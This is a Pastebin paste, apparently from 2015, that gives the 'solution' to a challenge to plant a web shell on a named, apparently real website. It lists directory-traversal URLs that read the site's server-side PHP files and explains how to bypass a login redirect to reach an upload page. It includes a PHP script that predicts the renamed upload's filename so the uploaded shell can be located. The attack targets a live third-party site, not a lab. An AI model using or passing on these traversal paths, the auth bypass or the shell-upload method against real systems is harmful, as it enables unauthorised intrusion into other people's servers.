API tools faq
paste
Advertisement
iAnonGuy

Zen's Shelling Challenge [Solution]

iAnonGuy
Aug 19th, 2015
483
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.02 KB | None | 0 0
raw download clone embed print report
  1. So the challenge was to shell the site..
  2. It was vulnerable to Directory Traversal, some people thought it's LFI, and were trying methods including php wrapper and stuff like that so anyways..
  3. Here occurs the vulnerabilty ~ http://www.vepr.info/zobraz_pohadku.php?pohadka=baron.txt
  4. Here's the full path ~ http://prntscr.com/86fm87
  5. After crawlin through the site we see there's a /upload.php, but if we go there we get redirected to "http://www.vepr.info/login.php?act=2&reason=99"
  6. but that's not a big deal we can easily bypass that by using NoRedirect, Let's read the file first..
  7.  
  8. http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/upload.php ~ http://prntscr.com/86fnk3
  9. by reading upload.php we see there's a require() to get dem functions, so let's read 'includes/func.php'
  10.  
  11. http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/includes/func.php ~ http://prntscr.com/86fpby
  12. by reading this we see that it takes a 'name' (your file name) and does some 'leety stuff' with it and returns it *adds sorta timestamp*..
  13.  
  14. so we just have to use that function like this, http://prntscr.com/86fwcz ~ save this somewhere and we'll use it later..
  15. ----
  16. <?php
  17. function dwn_name($name){
  18.   $oldname=basename($name);
  19.   $i=0;
  20.   while((substr($oldname,-$i-1,1)!=".")&&($i<strlen($oldname)))
  21.     $i++;
  22.   $ext=substr($oldname,-$i,$i);
  23.   $base=substr($oldname,0,strlen($oldname)-$i-1);
  24.   return $base."_[".substr(time(),1,7)."].".$ext;
  25. }
  26. $x = $_REQUEST['shell'];
  27. echo dwn_name($x);
  28. ?>
  29. ----
  30. let's go to upload.php but before that we'll add /login.php in NoRedirect's 'filter-list' ~ http://prntscr.com/86fss8
  31.  
  32. okay let's go ~ http://prntscr.com/86fxmz as soon as you get this message http://prntscr.com/86fwu3
  33. remember the php i told you to save? run it, and you'll get something like this. http://prntscr.com/86fx3t
  34. Ta-Da! ~ http://prntscr.com/86fx9k
  35. pl0x forgive me if there's any mistake ,_, dunt make fon of meh or i'll crie, i'll crie hurd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!